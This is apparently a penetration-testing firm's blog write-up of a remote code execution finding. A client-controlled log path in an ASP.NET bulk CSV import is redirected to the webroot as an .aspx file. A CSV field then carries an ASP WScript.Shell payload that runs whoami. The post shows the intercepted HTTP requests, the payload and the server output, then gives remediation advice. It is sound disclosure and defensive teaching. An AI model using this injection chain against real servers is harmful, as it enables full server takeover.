Welcome to our Pentest Files series. Each post presents a real, interesting, or dangerous finding one of our testers identified during an actual engagement, so you can see the kinds of things our pentesters get up to and take steps to prevent similar vulnerabilities in your own assets. Findings are taken from real reports and anonymised to protect client confidentiality.
The Finding
During a recent web application penetration test, our tester Craig Fairman uncovered a particularly creative Remote Code Execution (RCE) vulnerability. What made this one stand out wasn’t just the severity; it was the ingenuity of the technique: abusing a CSV import feature to inject malicious code into a server-generated file, then manipulating the application into writing that file as an executable script in the webroot.
Vulnerability type: Remote Code Execution (RCE) via Log File Injection
Severity: Critical
Discovered by: Craig Fairman, OnSecurity
The Setup: How It Started
Craig was testing an ASP.NET web application with an administrative bulk import feature. The workflow was straightforward: upload a CSV, preview the data, then click a button to confirm the import. As part of this process, the application wrote a summary log file to disk, recording what was imported, when, and by whom.
Log files are often dismissed as low-risk: they're just text files recording what happened, right?
Wrong.
Craig noticed something interesting in the preview step. When the application returned the confirmation page, the HTML contained a button with a data attribute holding the full server-side file path for the log that would be created during processing:
<button class="btn btn-primary"
        data-action="confirmimport"
        data-output="d:\inetpub\app\logs\bulk_import_20251112.txt"
        data-url="/admin/Records/ProcessBulkImport">
    Confirm Import
</button>
When the user clicked this button, client-side JavaScript extracted this path and sent it back to the server as a POST parameter. The server trusted it completely, meaning the log file’s destination was controlled client-side.
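In outline, the vulnerable server-side pattern looks something like the sketch below (illustrative Python, not the client's actual ASP.NET code — the function and parameter names are assumptions for the sake of the example):

```python
def process_bulk_import(form):
    """Hypothetical sketch of the flawed import handler."""
    # The server takes the output path straight from the request body --
    # the same path it embedded in the preview HTML one step earlier.
    output_file = form["output_file"]          # client-controlled!
    records = form["record_set"]

    with open(output_file, "w") as fh:         # path is never validated
        for record in records:
            # Field values are written verbatim -- no encoding, no stripping.
            fh.write(f"Imported {record['ID']}: {record['Description']}\n")
```

Both ingredients of the later exploit are visible here: the destination path round-trips through the client, and user-supplied field values land in the file untouched.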
The Exploit: A Four-Step Chain
Step 1: Upload a normal CSV and observe the flow
Craig uploaded a legitimate CSV to understand the import process and see how data flowed through the application.
ID,Description,StartDate,EndDate,Category
101,Quarterly Review,15/11/2025,16/11/2025,Internal
Step 2: Intercept the confirmation request and change the output path
When clicking the confirmation button, Craig intercepted the resulting HTTP request in Burp Suite. It included a parameter containing the file path the application had embedded in the preview HTML. Craig modified two things:
- The directory — from the application’s logs folder to its webroot.
- The file extension — from .txt to .aspx.
POST /admin/Records/ProcessBulkImport HTTP/2
Host: app.example.com
Content-Type: application/x-www-form-urlencoded
output_file=d:\inetpub\app\wwwroot\a8c3e9f1-4d72-41b0-b6a5-9f0e2d7c8b13.aspx
&record_set=[{"ID":"101","Description":"Quarterly Review","StartDate":"15/11/2025"...}]
The import processed normally, but instead of writing a .txt log to the logs folder, the application wrote the file into the webroot with an .aspx extension. Browsing to the file confirmed that field values from the CSV (such as Description) were echoed directly into the output.
Step 3: Replay the request with a payload in the CSV data
Now Craig knew user-supplied field values were written unsanitised into the output file. He replayed the request, this time embedding an ASP code expression in the Description field:
POST /admin/Records/ProcessBulkImport HTTP/2
Host: app.example.com
Content-Type: application/x-www-form-urlencoded
output_file=d:\inetpub\app\wwwroot\a8c3e9f1-4d72-41b0-b6a5-9f0e2d7c8b13.aspx
&record_set=[{"ID":"101","Description":"<%=CreateObject(\"WScript.Shell\").Exec(\"whoami\").StdOut.ReadAll()%>","StartDate":"15/11/2025"...}]
This classic ASP expression creates a WScript.Shell COM object, runs the Windows whoami command, and writes the output into the HTTP response. The application wrote this payload verbatim into the .aspx file — no sanitisation, no encoding.
Step 4: Request the file and trigger execution
A simple GET request to the newly created file was all it took:
GET /a8c3e9f1-4d72-41b0-b6a5-9f0e2d7c8b13.aspx HTTP/2
Host: app.example.com
The response contained the output of whoami:

iis apppool\defaultapppool
Remote code execution, achieved by turning a routine bulk import feature into a means of executing arbitrary commands on the server.
Why This Worked
Three things had to be true for this exploit to succeed, and all three were:
- The output file path was client-controlled. The server embedded a full file path in the preview HTML and trusted the client to return it unmodified. An attacker could change both the directory and the extension.
- CSV field values were written to the file unsanitised. The application echoed user-supplied data directly into the output without encoding or stripping dangerous characters.
- The webroot was writable and served dynamic content. Because the application could be instructed to write an .aspx file into a web-accessible directory, IIS would parse and execute it on request.
No single issue alone would have been critical. Unsanitised data written to a .txt log in a restricted directory is low risk. A controllable file path writing only safe content is concerning, but not devastating. Chained together, they give an attacker full control of the server.
Why This Is Dangerous
RCE is about as bad as it gets. From this foothold, an attacker could:
- Move laterally across internal systems
- Exfiltrate sensitive data, including customer records, credentials, or intellectual property
- Establish persistence, planting backdoors for long-term access
- Escalate privileges toward admin or root access
- Deploy ransomware or cause operational disruption
What makes this particular variant especially dangerous is how it abuses trusted application functionality. The import feature is working as designed; it's just being pointed somewhere it shouldn't be. There are no malicious file uploads, no exploit kits, no suspicious binaries. The application itself writes the file, making it far harder to detect through conventional monitoring.
The Remediation
The good news is that this class of vulnerability is preventable. The client was provided with clear remediation guidance and, using OnSecurity’s platform, was able to validate the fixes were effective through a free retest.
To prevent log injection leading to RCE:
Never trust client-supplied file paths. File destinations should be constructed entirely server-side. If a filename must be derived from user input, strip it down to alphanumeric characters, enforce a safe extension like .txt, and write to a fixed directory. Ensure the resulting path cannot escape the intended directory via traversal sequences.
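A sketch of what that server-side construction could look like (Python for illustration; the directory, length limit, and fallback name are assumptions, not the client's actual configuration):

```python
import re
from pathlib import Path

LOG_DIR = Path("/var/app/logs")  # fixed, non-web-accessible directory (illustrative)

def safe_log_path(user_supplied_name: str) -> Path:
    # Reduce user input to a conservative character set and bounded length.
    stem = re.sub(r"[^A-Za-z0-9_-]", "", user_supplied_name)[:64] or "import"
    # Enforce a safe extension and a fixed directory entirely server-side.
    candidate = (LOG_DIR / f"{stem}.txt").resolve()
    # Belt and braces: confirm the resolved path is still inside LOG_DIR.
    if LOG_DIR.resolve() not in candidate.parents:
        raise ValueError("path escapes log directory")
    return candidate
```

Fed the path from this finding, the function would collapse "../../wwwroot/shell.aspx" to a harmless "wwwrootshellaspx.txt" inside the log directory — the traversal sequences and the executable extension never survive.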
Sanitise all user input before writing to disk. Never write raw user-supplied strings to files. Strip or encode characters that could be interpreted as code (e.g. <?, <%, script tags). Note that sanitisation alone is not sufficient here; even perfectly sanitised content is dangerous if the file path and extension are attacker-controlled.
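Encoding is generally preferable to stripping, since the original data stays legible in the log. A minimal illustration in Python, using standard HTML entity encoding:

```python
import html

def sanitise_for_log(value: str) -> str:
    # Encode rather than strip: the data remains readable in the log,
    # but sequences like <% ... %> or <script> can no longer be
    # interpreted as code if the file is ever served by mistake.
    return html.escape(value, quote=True)
```

Run against the payload from this finding, the `<%` and `%>` delimiters come out as `&lt;%` and `%&gt;`, so nothing in the file parses as an ASP code block.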
Never store log files in web-accessible directories. Log files should live outside the web root entirely. Even if code is injected, the web server should never be able to serve the file directly.
Restrict write permissions on web-accessible directories. The web server process should not be able to write files into directories that serve dynamic content. Even if an attacker can control a file path, the write should fail if the webroot isn’t writable.
Use a centralised logging service. Ship logs to a dedicated log aggregation platform (e.g. ELK, Splunk, AWS CloudWatch) rather than writing them to local files on the server. This removes the attack surface entirely.
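Using Python's standard library purely as an illustration (the collector address is a placeholder), shipping log events over syslog instead of writing local files might look like:

```python
import logging
import logging.handlers

# Ship import-summary events to a central collector over syslog instead of
# writing files on the web server itself (address is illustrative).
logger = logging.getLogger("bulk_import")
logger.setLevel(logging.INFO)
handler = logging.handlers.SysLogHandler(address=("127.0.0.1", 514))
logger.addHandler(handler)

logger.info("bulk import complete")
```

With no file ever written to local disk, there is no path or extension for an attacker to redirect.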
Implement file extension controls. Configure your web server to only execute files with expected extensions in expected directories, and explicitly deny execution of log directories.
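On IIS specifically, one way to express this is a web.config fragment that treats everything under a given directory as static content — a sketch under the assumption that the log directory is named "logs", not a drop-in configuration:

```xml
<!-- Illustrative IIS web.config fragment: handlers in /logs are limited
     to read access, so script handlers never execute files stored there. -->
<configuration>
  <location path="logs">
    <system.webServer>
      <handlers accessPolicy="Read" />
    </system.webServer>
  </location>
</configuration>
```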
What This Looks Like in the Real World
This kind of vulnerability is more common than you’d think. Applications evolve rapidly, import features get bolted on, and developer teams don’t always think about the security implications of where and how server-generated files are stored. A harmless log path becomes a serious problem the moment it can be redirected to the webroot with an executable extension.
This finding was discovered during a structured, time-boxed penetration test. Without that test, this critical vulnerability could have remained undetected indefinitely, quietly waiting to be found by someone with far less benign intentions.
Craig identified and reported this finding in real time through OnSecurity’s platform, meaning the client’s team was able to see the issue, understand its impact, and begin remediation work while the test was still in progress — not weeks later when a PDF arrived in their inbox.
How to Protect Yourself
If your application writes any data to files on disk, it’s worth asking:
- Could anyone, internal or external, influence the path, filename, or extension of those files?
- Is user input sanitised before it’s written to disk?
- Are output files stored outside of web-accessible directories?
If you’re not certain of the answers, a penetration test is the most reliable way to find out before an attacker does.
Want to know if your application is vulnerable? Get a quote from OnSecurity. Benefit from real-time reporting so that you can remediate findings as soon as they are discovered.


